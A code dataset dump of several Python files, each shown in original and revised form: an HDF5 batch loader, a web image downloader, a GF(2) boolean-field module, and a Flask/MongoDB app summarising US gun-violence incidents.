        h5keys = self.h5data.keys()
        # Map each requested key prefix to the sorted list of chunk numbers
        # found in the file (e.g. 'data' -> [1, 2, 3]).
        self.groupedData = {}
        for key in keys2fetch: self.groupedData[key] = []
        for key in h5keys:
            if any(x in key for x in keys2fetch):
                curInd = [x in key for x in keys2fetch]
                # Total row count is taken from the first key's chunks only;
                # all keys are assumed to have matching lengths.
                if curInd[0]:
                    self.numData += len(self.h5data[key])
                curKey = keys2fetch[curInd.index(True)]
                self.groupedData[curKey].append(int(key[len(curKey):]))
        for key in keys2fetch: self.groupedData[key].sort()
        self.startInd = 0
        self.stopInd = self.numData
        self.curInd = self.startInd
        assert batchSize<self.numData, "batchSize larger than dataset; batchSize: "+str(batchSize)+" dataSize: "+str(self.numData)
        # Rows per stored chunk, read from the first chunk of the first key.
        self.h5chunkSize = len(self.h5data[keys2fetch[0] + '1'])
        self.keySizes = {}
        for key in keys2fetch: self.keySizes[key] = self.h5data[key + '1'].shape[1]
        # Output buffers are allocated once and reused by getBatch().
        self.returnArrays = {}
        for key in keys2fetch:
            self.returnArrays[key] = np.zeros((self.batchSize, self.keySizes[key]), dtype=np.float32)
    def getBatch(self):
        """Fill and return the reusable per-key arrays with the next batch,
        wrapping back to the start when the end of the data is reached.

        # NOTE(review): the copy loop resets curDsetInd before computing the
        # advance increment, and curInd advances once after the key loop —
        # looks fragile for batches spanning chunk boundaries; verify
        # against real data before relying on exact batch contents.
        """
        if (self.curInd + self.batchSize) >= self.stopInd:
            self.curInd = self.startInd
        # Chunk datasets are 1-based: row r lives in chunk r/chunkSize + 1.
        startDsetNum = self.curInd / self.h5chunkSize + 1
        startDsetInd = self.curInd % self.h5chunkSize
        endDsetNum = (self.curInd + self.batchSize) / self.h5chunkSize + 1
        for key in self.keys2fetch:
            curInd = 0
            curDset = startDsetNum
            curDsetInd = startDsetInd
            while curInd < self.batchSize:
                dsetShape = self.h5data[key + str(curDset)].shape
                self.returnArrays[key][curInd:min(dsetShape[0] - curDsetInd, self.batchSize + curDsetInd), :] = \
                    self.h5data[key + str(curDset)][curDsetInd:min(dsetShape[0], self.batchSize + curDsetInd), :]
                curDset += 1
                curDsetInd = 0
                curInd += min(dsetShape[0] - curDsetInd, self.batchSize)
        self.curInd += self.batchSize
        return self.returnArrays
| 2,343 | -10 | 76 |
22575a73bd860dd9485b3daa0bbc132d26217211 | 1,216 | py | Python | 0_Complete_Guide_To_Custom_Object_Detection_Model_With_Yolov5/WebScraping/src/util/image_downloader.py | CertifaiAI/classifai-blogs | 23a3e7f5241c27f74ffeb614cc730f21c35e9e2f | [
"Apache-2.0"
] | 3 | 2021-05-17T01:25:56.000Z | 2021-05-31T01:12:53.000Z | 0_Complete_Guide_To_Custom_Object_Detection_Model_With_Yolov5/WebScraping/src/util/image_downloader.py | CertifaiAI/classifai-blogs | 23a3e7f5241c27f74ffeb614cc730f21c35e9e2f | [
"Apache-2.0"
] | 1 | 2021-08-19T02:50:06.000Z | 2021-08-19T02:50:18.000Z | 0_Complete_Guide_To_Custom_Object_Detection_Model_With_Yolov5/WebScraping/src/util/image_downloader.py | CertifaiAI/classifai-blogs | 23a3e7f5241c27f74ffeb614cc730f21c35e9e2f | [
"Apache-2.0"
] | 2 | 2021-06-09T05:48:59.000Z | 2021-06-10T06:29:53.000Z | from PIL import Image
import requests
from io import BytesIO
import base64
import os
def save_image(src, counter, path):
"""Method for saving a single image"""
cur_dir = os.getcwd()
image_root_path = os.path.join(cur_dir, "images")
if not os.path.isdir(image_root_path):
os.mkdir(image_root_path)
image_path = os.path.join(image_root_path, path)
if not os.path.isdir(image_path):
os.mkdir(image_path)
output_path = os.path.join(image_path,f"{path}_{format(counter, '04d')}.png")
if src.startswith("http"):
try:
response = requests.get(src, timeout=20)
img = Image.open(BytesIO(response.content))
img.save(output_path)
except:
return False
else:
try:
img = Image.open(src)
img.save(output_path)
except:
return False
print(f"Save Image: {output_path}")
return True
def save_images(src_list, path, img_num):
"""Method for saving a list of images"""
counter = 1
for src in src_list:
if counter == img_num + 1:
break
if (save_image(src, counter, path)):
counter += 1
| 24.816327 | 81 | 0.596217 | from PIL import Image
import requests
from io import BytesIO
import base64
import os
def save_image(src, counter, path):
    """Save a single image to images/<path>/<path>_NNNN.png.

    *src* may be an http(s) URL (downloaded with a 20s timeout) or a local
    file path.  Returns True on success, False when the image could not be
    fetched or decoded.
    """
    cur_dir = os.getcwd()
    image_root_path = os.path.join(cur_dir, "images")
    image_path = os.path.join(image_root_path, path)
    # exist_ok avoids the isdir-then-mkdir race and creates both levels.
    os.makedirs(image_path, exist_ok=True)
    output_path = os.path.join(image_path, f"{path}_{format(counter, '04d')}.png")
    if src.startswith("http"):
        try:
            response = requests.get(src, timeout=20)
            img = Image.open(BytesIO(response.content))
            img.save(output_path)
        except Exception:
            # Narrowed from a bare except: a failed download/decode returns
            # False, but KeyboardInterrupt/SystemExit are no longer swallowed.
            return False
    else:
        try:
            img = Image.open(src)
            img.save(output_path)
        except Exception:
            # Narrowed from a bare except (see above).
            return False
    print(f"Save Image: {output_path}")
    return True
def save_images(src_list, path, img_num):
    """Save up to *img_num* images from *src_list* into images/<path>/.

    Failed saves do not consume a slot: the counter only advances on
    success, so numbering stays contiguous.
    """
    saved = 0
    for src in src_list:
        if saved >= img_num:
            break
        if save_image(src, saved + 1, path):
            saved += 1
| 0 | 0 | 0 |
4f1f7997e4d027884b195e0bb4bf1141ba0efaec | 4,788 | py | Python | sandbox/pyexprfield.py | turkeydonkey/nzmath3 | a48ae9efcf0d9ad1485c2e9863c948a7f1b20311 | [
"BSD-3-Clause"
] | 1 | 2021-05-26T19:22:17.000Z | 2021-05-26T19:22:17.000Z | sandbox/pyexprfield.py | turkeydonkey/nzmath3 | a48ae9efcf0d9ad1485c2e9863c948a7f1b20311 | [
"BSD-3-Clause"
] | null | null | null | sandbox/pyexprfield.py | turkeydonkey/nzmath3 | a48ae9efcf0d9ad1485c2e9863c948a7f1b20311 | [
"BSD-3-Clause"
] | null | null | null | """
Python Expression field, another finite prime field characteristic two definition.
field element is defined by bool(Python Expression).
This module is reference design for finite field characteristic two.
but I recommend that this field should be used only checking Python syntax.
"""
import logging
import operator
_log = logging.getLogger('sandbox.pyexprfield')
import sandbox.finitefield as finitefield
class PythonExpressionFieldElement(finitefield.FiniteFieldElement):
"""
The element of boolean field.
"""
def __init__(self, expression):
""" boolean must be Python expression.
"""
self.boolean = bool(expression)
def xor(self, other):
""" return self xor other .
"""
return self.__class__(not (self == other))
__radd__ = __add__
__sub__ = __add__
__rsub__ = __add__
__rmul__ = __mul__
def __div__(self, other):
""" compute formal division.
In Python expression, 0 is False, so dividing False causes ZeroDivisionerror.
"""
if not other:
raise ZeroDivisionError("False represents zero, this operation is ZeroDivision.")
return self.__class__(self.boolean)
__truediv__ = __div__
__floordiv__ = __div__
__rdiv__ = __div__
__rtruediv__ = __div__
__rfloordiv__ = __div__
__invert__ = __neg__
def toFinitePrimeFieldElement(self):
""" get FinitePrimeField(2) element with bijective map.
"""
if self.boolean:
return finitefield.FinitePrimeFieldElement(1, 2)
return finitefield.FinitePrimeFieldElement(0, 2)
| 28 | 93 | 0.6368 | """
Python Expression field, another finite prime field characteristic two definition.
field element is defined by bool(Python Expression).
This module is reference design for finite field characteristic two.
but I recommend that this field should be used only checking Python syntax.
"""
import logging
import operator
_log = logging.getLogger('sandbox.pyexprfield')
import sandbox.finitefield as finitefield
class PythonExpressionFieldElement(finitefield.FiniteFieldElement):
    """
    An element of the boolean field GF(2), represented by the truth value
    of an arbitrary Python expression: True is one, False is zero.
    """
    def __init__(self, expression):
        """boolean must be a Python expression; it is collapsed via bool()."""
        self.boolean = bool(expression)
    def __eq__(self, other):
        return self.boolean == other
    def __hash__(self):
        # Bug fix: defining __eq__ without __hash__ made instances
        # unhashable on Python 3; hash the underlying truth value so
        # equal elements hash equal.
        return hash(self.boolean)
    def getRing(self):
        return PythonExpressionField()
    def __repr__(self):
        return "%s(%s)" % (self.__class__.__name__, self.boolean)
    def __str__(self):
        return str(self.boolean)
    def xor(self, other):
        """ return self xor other .
        """
        return self.__class__(not (self == other))
    def __add__(self, other):
        # Addition in characteristic 2 is exclusive-or.
        return self.__class__(self.xor(other))
    __radd__ = __add__
    __sub__ = __add__
    __rsub__ = __add__
    def __mul__(self, other):
        return self.__class__(self.boolean and other)
    __rmul__ = __mul__
    def __div__(self, other):
        """ compute formal division.
        In Python expression, 0 is False, so dividing False causes ZeroDivisionerror.
        """
        if not other:
            raise ZeroDivisionError("False represents zero, this operation is ZeroDivision.")
        return self.__class__(self.boolean)
    __truediv__ = __div__
    __floordiv__ = __div__
    __rdiv__ = __div__
    __rtruediv__ = __div__
    __rfloordiv__ = __div__
    def __bool__(self):
        # Bug fix: previously returned `not self.boolean`, inverting truth
        # (zero tested as True and one as False).  False represents zero,
        # so an element is truthy exactly when its boolean is True — this
        # also makes the zero test in __div__ agree with its docstring.
        return self.boolean
    def __pow__(self, index):
        if index == 0:
            # x**0 is the multiplicative identity.
            return self.__class__(True)
        return self.__class__(self.boolean)
    def __neg__(self):
        # NOTE(review): in characteristic 2 the additive inverse is the
        # identity (-x == x); returning logical NOT looks suspect but is
        # kept as-is — confirm intended semantics before changing.
        return self.__class__(not self.boolean)
    def __pos__(self):
        return self.__class__(self.boolean)
    __invert__ = __neg__
    def __coerce__(self, other):
        # Python 2 relic; ignored by Python 3 but harmless to keep.
        return (self, self.__class__(other))
    def toFinitePrimeFieldElement(self):
        """ get FinitePrimeField(2) element with bijective map.
        """
        if self.boolean:
            return finitefield.FinitePrimeFieldElement(1, 2)
        return finitefield.FinitePrimeFieldElement(0, 2)
class PythonExpressionField(finitefield.FiniteField):
    """The prime field of characteristic two whose elements are the truth
    values of Python expressions (see PythonExpressionFieldElement)."""
    def __init__(self):
        characteristic = 2 # BooleanField = {True, False}
        finitefield.FiniteField.__init__(self, characteristic)
    def __contains__(self, element):
        """Python expressions are either pass or raise SyntaxError.
        in other words, always true.
        """
        return True
    def card(self):
        """Cardinality of the field (2)."""
        return self.char
    def createElement(self, expression):
        return PythonExpressionFieldElement(expression)
    def order(self, element):
        """Multiplicative order of *element*; zero (False) is not in the group."""
        if element:
            return 1
        raise ValueError("False is zero, not in the group.")
    def __repr__(self):
        return "%s()" % (self.__class__.__name__)
    def __hash__(self):
        return self.char & 0xFFFFFFFF
    def issubring(self, other):
        """
        Report whether another ring contains the field as a subring.
        """
        if self == other:
            return True
        # Bug fix (old FIXME): 'FiniteField' was an undefined bare name;
        # use the class from the imported finitefield module.
        if isinstance(other, finitefield.FiniteField) and other.getCharacteristic() == self.char:
            return True
        try:
            return other.issuperring(self)
        except Exception:
            # Narrowed from a bare except: other may lack issuperring.
            return False
    def issuperring(self, other):
        """
        Report whether the field is a superring of another ring.
        Since the field is a prime field, it can be a superring of
        itself only.
        """
        if self == other:
            return True
        # Bug fix (old FIXME): same undefined 'FiniteField' name as above.
        if isinstance(other, finitefield.FiniteField) and other.getCharacteristic() == self.char:
            return True
        return False
    def __bool__(self):
        return True
    # properties
    def _getOne(self):
        "getter for one"
        if self._one is None:
            # Bug fix (old FIXME): 'PythonExpressionElement' did not exist;
            # the element class is PythonExpressionFieldElement.
            self._one = PythonExpressionFieldElement(1)
        return self._one
    one = property(_getOne, None, None, "multiplicative unit.")
    def _getZero(self):
        "getter for zero"
        if self._zero is None:
            # Bug fix (old FIXME): same undefined element-class name as above.
            self._zero = PythonExpressionFieldElement(0)
        return self._zero
    zero = property(_getZero, None, None, "additive unit.")
5cd80199edec3fb9faa21f7e2426eab3da37d240 | 73 | py | Python | code/MPGenPython/motion_profile/__init__.py | shuqinlee/PedestrianDetection | eb3353e8d22fb855f5a233dd4c468933ced91022 | [
"MIT"
] | 4 | 2018-03-17T13:44:33.000Z | 2018-12-28T02:59:28.000Z | code/MPGenPython/motion_profile/__init__.py | shuqinlee/PedestrianDetection | eb3353e8d22fb855f5a233dd4c468933ced91022 | [
"MIT"
] | null | null | null | code/MPGenPython/motion_profile/__init__.py | shuqinlee/PedestrianDetection | eb3353e8d22fb855f5a233dd4c468933ced91022 | [
"MIT"
] | null | null | null | # __init__: let python know this is a package
from mpgen import mpgen
| 18.25 | 46 | 0.753425 | # __init__: let python know this is a package
from mpgen import mpgen
| 0 | 0 | 0 |
ec565786d077cf1223be311832047f6026c29ef5 | 9,833 | py | Python | GunsApp/app.py | rabest265/Guns2 | dce211b2494d5a130fd706ff76646365d9ef3e57 | [
"CNRI-Python",
"OML"
] | null | null | null | GunsApp/app.py | rabest265/Guns2 | dce211b2494d5a130fd706ff76646365d9ef3e57 | [
"CNRI-Python",
"OML"
] | null | null | null | GunsApp/app.py | rabest265/Guns2 | dce211b2494d5a130fd706ff76646365d9ef3e57 | [
"CNRI-Python",
"OML"
] | null | null | null | from flask import Flask, render_template, redirect, jsonify
from flask_pymongo import PyMongo
from datetime import datetime
import json
import pandas as pd
import os
import numpy as np
import datetime
import csv
import pymongo
import request
# function to save dataframe to collection_name in MongoDB 'wines'
# In[2]:
# Load CSV file
csv_path = os.path.join('..',"rawdata", "gun-violence-data_01-2013_12-2015.csv")
# Read the first half of the gun violence file and store into Pandas data frame
gun_violence_df_2015 = pd.read_csv(csv_path, encoding = "ISO-8859-1")
gun_violence_df_2015.head()
# In[3]:
# Load CSV file
csv_path = os.path.join('..',"rawdata", "gun-violence-data_01-2016_03-2018.csv")
# Read the second half of the gun violence file and store into Pandas data frame
gun_violence_df_2018 = pd.read_csv(csv_path, encoding = "ISO-8859-1")
gun_violence_df_2018.head()
# In[4]:
# Recomine the two files
gun_violence_df= pd.concat([gun_violence_df_2015, gun_violence_df_2018])
gun_violence_df.head()
# In[5]:
# Convert the date field to date/time and removed unnecessary columns
gun_violence_df['date']= pd.to_datetime(gun_violence_df['date'])
gun_violence_df=gun_violence_df.loc[(gun_violence_df['date'] <'2018-01-01') & (gun_violence_df['date']>'2013-12-31') ]
gun_violence_df.drop(columns=['address', 'incident_url', 'incident_url_fields_missing', 'source_url', 'participant_name','sources', 'location_description','notes'], inplace=True, axis=1)
gun_violence_df.head()
# In[6]:
# Search the incident_characteristics for specific incident types and set that incident type to True
gun_violence_df["mass"]=np.where(gun_violence_df['incident_characteristics'].str.contains("Mass Shooting", case=False, na=False), True, False)
gun_violence_df["gang"]=np.where(gun_violence_df['incident_characteristics'].str.contains("Gang", case=False, na=False), True, False)
gun_violence_df["domestic"]=np.where(gun_violence_df['incident_characteristics'].str.contains("Domestic Violence", case=False, na=False), True, False)
gun_violence_df["non-shooting"]=np.where(gun_violence_df['incident_characteristics'].str.contains("Non-Shooting", case=False, na=False), True, False)
gun_violence_df["accidental"]=np.where(gun_violence_df['incident_characteristics'].str.contains("Accidental", case=False, na=False), True, False)
gun_violence_df["prohibited"]=np.where(gun_violence_df['incident_characteristics'].str.contains("prohibited", case=False, na=False), True, False)
gun_violence_df['officer'] = np.where(gun_violence_df['incident_characteristics'].str.contains("Officer|TSA", case=False, na=False), True, False)
gun_violence_df.head()
# ## Load csv files into pandas dataframes, clean, save to mongo db
# In[7]:
# read in cities data
cities_path = os.path.join("..","Data","Cities.csv")
df_cities = pd.read_csv(cities_path, encoding="UTF-8")
df_cities.head()
# # save to/replace collection "cities" in "guns" mongo db
saveMongo(df_cities, "cities", replace=True)
# In[8]:
# read in state data
states_path = os.path.join("..","Data","States.csv")
df_states = pd.read_csv(states_path, encoding="UTF-8")
df_states = df_states[["state","census_2010","pop_estimate_2015","2015_median_income", "age18longgunpossess","age21longgunpossess","assault","mentalhealth","universal"]]
df_states.head()
# # save to/replace collection "states" in "guns" mongo db
saveMongo(df_states, "states", replace=True)
# In[12]:
# Loading gun violence
df_guns = gun_violence_df
df_guns = df_guns[["incident_id","date","state","city_or_county","n_killed","n_injured","incident_characteristics","latitude","longitude","mass","gang","domestic","non-shooting","accidental","prohibited","officer"]]
df_guns["n_involved"] = df_guns["n_killed"]+df_guns["n_injured"]
df_guns["year"]= pd.DatetimeIndex(df_guns['date']).year
# Create a column to record type of shooting
conditions = [
(df_guns["mass"]==1),
(df_guns["n_involved"] == 0),
(df_guns["n_killed"]==0)]
choices = ["mass shooting", "no injuries","injuries only"]
df_guns["shoot_type"] = np.select(conditions, choices, default="some dead")
df_guns.head()
# Add in state level data for filtering purposes
df_guns_complete = pd.merge(df_guns, df_states, on="state", how="left")
df_guns_complete["count"] = 1
df_guns_complete.head()
# save to/replace collection "guns" in "guns" mongo db
saveMongo(df_guns_complete, "guns", replace=True)
# In[10]:
summary_guns_df = df_guns_complete.groupby("shoot_type",as_index=False).sum()[["pop_estimate_2015"]]
summary_guns_df["shoot_type"] = df_guns_complete.groupby("shoot_type",as_index=False).first()["shoot_type"]
summary_guns_df["Count"] = df_guns_complete.groupby("shoot_type",as_index=False).sum()[["count"]]
summary_guns_df["n_killed"]= df_guns_complete.groupby("shoot_type",as_index=False).sum()[["n_killed"]]
summary_guns_df["Incidents_per_100M"] = summary_guns_df ["Count"]/summary_guns_df["pop_estimate_2015"]*100000000
summary_guns_df["Killed_per_100M"] = summary_guns_df ["n_killed"]/summary_guns_df["pop_estimate_2015"]*100000000
summary_guns_df.reset_index()
summary_guns_df.head()
# save to/replace collection "guns_summary" in "guns" mongo db
saveMongo(summary_guns_df, "guns_summary", replace=True)
# In[17]:
summary_states_df = df_guns_complete.groupby(["shoot_type","state"], as_index=False).sum()[["pop_estimate_2015"]]
summary_states_df["state"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["state"]
summary_states_df["shoot_type"] = df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["shoot_type"]
summary_states_df["Count"] = df_guns_complete.groupby(["shoot_type", "state"],as_index=False).sum()[["count"]]
summary_states_df["n_killed"]= df_guns_complete.groupby(["shoot_type","state"],as_index=False).sum()[["n_killed"]]
summary_states_df["Incidents_per_100M"] = summary_states_df ["Count"]/summary_states_df["pop_estimate_2015"]*100000000
summary_states_df["Killed_per_100M"] = summary_states_df ["n_killed"]/summary_states_df["pop_estimate_2015"]*100000000
summary_states_df["2015_median_income"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["2015_median_income"]
summary_states_df["age18longgunpossess"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["age18longgunpossess"]
summary_states_df["age21longgunpossess"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["age21longgunpossess"]
summary_states_df["assault"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["assault"]
summary_states_df["mentalhealth"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["mentalhealth"]
summary_states_df["universal"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["universal"]
summary_states_df.reset_index()
summary_states_df.head()
# save to/replace collection "state_summary" in "guns" mongo db
saveMongo(summary_states_df, "state_summary", replace=True)
s
# from bson.json_util import loads
# Create an instance of Flask
app = Flask(__name__)
# Use PyMongo to establish Mongo connection
mongo = PyMongo(app, uri="mongodb://localhost:27017/guns")
# Define shooting list
ShootList = ["mass shooting", "no injuries", "injuries only", "some dead"]
# ShootList = ["mass shooting"]
@app.route("/")
@app.route("/maps")
@app.route("/benchmark")
@app.route("/interactive_chart")
@app.route("/jsonifiedcities")
@app.route("/jsonifiedguns")
@app.route("/jsonifiedguns/<yr>")
@app.route("/jsonifiedstates")
@app.route("/jsonifiedsummary")
@app.route("/jsonifiedstatesummary")
if __name__ == "__main__":
app.run(debug=True)
| 35.243728 | 215 | 0.73711 | from flask import Flask, render_template, redirect, jsonify
from flask_pymongo import PyMongo
from datetime import datetime
import json
import pandas as pd
import os
import numpy as np
import datetime
import csv
import pymongo
import request
# function to save a dataframe to collection_name in the MongoDB 'guns' database
def saveMongo(df, collection_name, replace=False):
    """Persist a pandas DataFrame to `collection_name` in the local 'guns' MongoDB.

    Parameters:
        df: DataFrame whose rows become one document each.
        collection_name: target collection name.
        replace: when True, drop any existing collection of that name first.
    """
    # Use the client as a context manager so the connection is closed on every
    # call (the original leaked one MongoClient per invocation).
    with pymongo.MongoClient('localhost', 27017) as mng_client:
        mng_db = mng_client['guns']
        if replace:
            mng_db[collection_name].drop()
        db_cm = mng_db[collection_name]
        # Round-trip through JSON so timestamps/NaN become Mongo-friendly values.
        data_json = json.loads(df.to_json(orient='records', date_unit='ns'))
        db_cm.insert_many(data_json)
# In[2]:
# Load CSV file
csv_path = os.path.join('..',"rawdata", "gun-violence-data_01-2013_12-2015.csv")
# Read the first half of the gun violence file and store into Pandas data frame
gun_violence_df_2015 = pd.read_csv(csv_path, encoding = "ISO-8859-1")
gun_violence_df_2015.head()
# In[3]:
# Load CSV file
csv_path = os.path.join('..',"rawdata", "gun-violence-data_01-2016_03-2018.csv")
# Read the second half of the gun violence file and store into Pandas data frame
gun_violence_df_2018 = pd.read_csv(csv_path, encoding = "ISO-8859-1")
gun_violence_df_2018.head()
# In[4]:
# Recombine the two files
gun_violence_df= pd.concat([gun_violence_df_2015, gun_violence_df_2018])
gun_violence_df.head()
# In[5]:
# Convert the date field to date/time and removed unnecessary columns
gun_violence_df['date']= pd.to_datetime(gun_violence_df['date'])
gun_violence_df=gun_violence_df.loc[(gun_violence_df['date'] <'2018-01-01') & (gun_violence_df['date']>'2013-12-31') ]
gun_violence_df.drop(columns=['address', 'incident_url', 'incident_url_fields_missing', 'source_url', 'participant_name','sources', 'location_description','notes'], inplace=True, axis=1)
gun_violence_df.head()
# In[6]:
# Search the incident_characteristics for specific incident types and set that incident type to True
gun_violence_df["mass"]=np.where(gun_violence_df['incident_characteristics'].str.contains("Mass Shooting", case=False, na=False), True, False)
gun_violence_df["gang"]=np.where(gun_violence_df['incident_characteristics'].str.contains("Gang", case=False, na=False), True, False)
gun_violence_df["domestic"]=np.where(gun_violence_df['incident_characteristics'].str.contains("Domestic Violence", case=False, na=False), True, False)
gun_violence_df["non-shooting"]=np.where(gun_violence_df['incident_characteristics'].str.contains("Non-Shooting", case=False, na=False), True, False)
gun_violence_df["accidental"]=np.where(gun_violence_df['incident_characteristics'].str.contains("Accidental", case=False, na=False), True, False)
gun_violence_df["prohibited"]=np.where(gun_violence_df['incident_characteristics'].str.contains("prohibited", case=False, na=False), True, False)
gun_violence_df['officer'] = np.where(gun_violence_df['incident_characteristics'].str.contains("Officer|TSA", case=False, na=False), True, False)
gun_violence_df.head()
# ## Load csv files into pandas dataframes, clean, save to mongo db
# In[7]:
# read in cities data
cities_path = os.path.join("..","Data","Cities.csv")
df_cities = pd.read_csv(cities_path, encoding="UTF-8")
df_cities.head()
# # save to/replace collection "cities" in "guns" mongo db
saveMongo(df_cities, "cities", replace=True)
# In[8]:
# read in state data
states_path = os.path.join("..","Data","States.csv")
df_states = pd.read_csv(states_path, encoding="UTF-8")
df_states = df_states[["state","census_2010","pop_estimate_2015","2015_median_income", "age18longgunpossess","age21longgunpossess","assault","mentalhealth","universal"]]
df_states.head()
# # save to/replace collection "states" in "guns" mongo db
saveMongo(df_states, "states", replace=True)
# In[12]:
# Loading gun violence
df_guns = gun_violence_df
df_guns = df_guns[["incident_id","date","state","city_or_county","n_killed","n_injured","incident_characteristics","latitude","longitude","mass","gang","domestic","non-shooting","accidental","prohibited","officer"]]
df_guns["n_involved"] = df_guns["n_killed"]+df_guns["n_injured"]
df_guns["year"]= pd.DatetimeIndex(df_guns['date']).year
# Create a column to record type of shooting
conditions = [
(df_guns["mass"]==1),
(df_guns["n_involved"] == 0),
(df_guns["n_killed"]==0)]
choices = ["mass shooting", "no injuries","injuries only"]
df_guns["shoot_type"] = np.select(conditions, choices, default="some dead")
df_guns.head()
# Add in state level data for filtering purposes
df_guns_complete = pd.merge(df_guns, df_states, on="state", how="left")
df_guns_complete["count"] = 1
df_guns_complete.head()
# save to/replace collection "guns" in "guns" mongo db
saveMongo(df_guns_complete, "guns", replace=True)
# In[10]:
summary_guns_df = df_guns_complete.groupby("shoot_type",as_index=False).sum()[["pop_estimate_2015"]]
summary_guns_df["shoot_type"] = df_guns_complete.groupby("shoot_type",as_index=False).first()["shoot_type"]
summary_guns_df["Count"] = df_guns_complete.groupby("shoot_type",as_index=False).sum()[["count"]]
summary_guns_df["n_killed"]= df_guns_complete.groupby("shoot_type",as_index=False).sum()[["n_killed"]]
summary_guns_df["Incidents_per_100M"] = summary_guns_df ["Count"]/summary_guns_df["pop_estimate_2015"]*100000000
summary_guns_df["Killed_per_100M"] = summary_guns_df ["n_killed"]/summary_guns_df["pop_estimate_2015"]*100000000
summary_guns_df.reset_index()
summary_guns_df.head()
# save to/replace collection "guns_summary" in "guns" mongo db
saveMongo(summary_guns_df, "guns_summary", replace=True)
# In[17]:
summary_states_df = df_guns_complete.groupby(["shoot_type","state"], as_index=False).sum()[["pop_estimate_2015"]]
summary_states_df["state"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["state"]
summary_states_df["shoot_type"] = df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["shoot_type"]
summary_states_df["Count"] = df_guns_complete.groupby(["shoot_type", "state"],as_index=False).sum()[["count"]]
summary_states_df["n_killed"]= df_guns_complete.groupby(["shoot_type","state"],as_index=False).sum()[["n_killed"]]
summary_states_df["Incidents_per_100M"] = summary_states_df ["Count"]/summary_states_df["pop_estimate_2015"]*100000000
summary_states_df["Killed_per_100M"] = summary_states_df ["n_killed"]/summary_states_df["pop_estimate_2015"]*100000000
summary_states_df["2015_median_income"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["2015_median_income"]
summary_states_df["age18longgunpossess"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["age18longgunpossess"]
summary_states_df["age21longgunpossess"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["age21longgunpossess"]
summary_states_df["assault"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["assault"]
summary_states_df["mentalhealth"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["mentalhealth"]
summary_states_df["universal"]= df_guns_complete.groupby(["shoot_type", "state"],as_index=False).first()["universal"]
# NOTE(review): reset_index()/head() return new frames that are discarded here;
# kept only as notebook-style inspection calls.
summary_states_df.reset_index()
summary_states_df.head()
# save to/replace collection "state_summary" in "guns" mongo db
saveMongo(summary_states_df, "state_summary", replace=True)
# Removed a stray lone `s` statement that raised NameError at import time.
# from bson.json_util import loads
# Create an instance of Flask
app = Flask(__name__)
# Use PyMongo to establish Mongo connection
mongo = PyMongo(app, uri="mongodb://localhost:27017/guns")
# Define shooting list
ShootList = ["mass shooting", "no injuries", "injuries only", "some dead"]
# ShootList = ["mass shooting"]
# Page routes: each renders one template, passing the shoot-type filter options.
@app.route("/")
def home():
    """Landing page."""
    return render_template("index.html", ShootList = ShootList)
@app.route("/maps")
def charts():
    """Incident map page."""
    return render_template("maps.html", ShootList = ShootList)
@app.route("/benchmark")
def bench():
    """Benchmark comparison page."""
    return render_template("benchmark.html", ShootList = ShootList)
@app.route("/interactive_chart")
def intercharts():
    """Interactive chart page."""
    return render_template("interactive_chart.html", ShootList = ShootList)
@app.route("/jsonifiedcities")
def jsonifiedcities():
    """Serve every city document as JSON, stripped of the non-serializable _id."""
    documents = list(mongo.db.cities.find())
    for document in documents:
        del document["_id"]
    return jsonify(documents)
@app.route("/jsonifiedguns")
def jsonifiedguns():
    """Serve incident documents whose shoot_type is in ShootList, minus _id."""
    selected = []
    for record in mongo.db.guns.find():
        # _id is a BSON ObjectId and cannot be jsonify'd.
        del record["_id"]
        if record["shoot_type"] in ShootList:
            selected.append(record)
    return jsonify(selected)
@app.route("/jsonifiedguns/<yr>")
def jsonifiedgunsy(yr):
    """Serve incident documents for one year, filtered to ShootList, minus _id.

    yr arrives as a URL path string and is converted with int(); a non-numeric
    value will raise ValueError.
    """
    gunlist = []
    guninfo = mongo.db.guns.find({ "year": int(yr) })
    #guninfo = mongo.db.guns.find()
    for gun in guninfo:
        # _id is a BSON ObjectId and cannot be jsonify'd.
        del gun["_id"]
        if gun["shoot_type"] in ShootList:
            gunlist.append(gun)
    # Debug output: number of matching incidents, printed to the server console.
    print(len(gunlist))
    return jsonify(gunlist)
@app.route("/jsonifiedstates")
def jsonifiedstates():
    """Serve every state document as JSON, stripped of the non-serializable _id."""
    documents = list(mongo.db.states.find())
    for document in documents:
        del document["_id"]
    return jsonify(documents)
@app.route("/jsonifiedsummary")
def jsonifiedsummary():
    """Serve the per-shoot-type summary collection as JSON, minus _id."""
    summarylist = []
    summaryinfo = mongo.db.guns_summary.find()
    for shoot_type in summaryinfo:
        # _id is a BSON ObjectId and cannot be jsonify'd.
        del shoot_type["_id"]
        summarylist.append(shoot_type)
    return jsonify(summarylist)
@app.route("/jsonifiedstatesummary")
def jsonifiedstatesummary():
    """Serve the per-state, per-shoot-type summary collection as JSON, minus _id."""
    statesummarylist = []
    statesummaryinfo = mongo.db.state_summary.find()
    for shoot_type in statesummaryinfo:
        # _id is a BSON ObjectId and cannot be jsonify'd.
        del shoot_type["_id"]
        statesummarylist.append(shoot_type)
    return jsonify(statesummarylist)
# Start the Flask development server when this file is executed directly.
if __name__ == "__main__":
    app.run(debug=True)
| 1,880 | 0 | 242 |
97786e7328a0171fd55f09db622f3afa0975d1e7 | 11,555 | py | Python | tests/test_reference.py | novirium/docker-image-py | cf4eb19e6fe983b58b10b70816fe1ed02c9e7f09 | [
"Apache-2.0"
] | 17 | 2017-02-25T13:59:22.000Z | 2022-03-23T07:37:46.000Z | tests/test_reference.py | novirium/docker-image-py | cf4eb19e6fe983b58b10b70816fe1ed02c9e7f09 | [
"Apache-2.0"
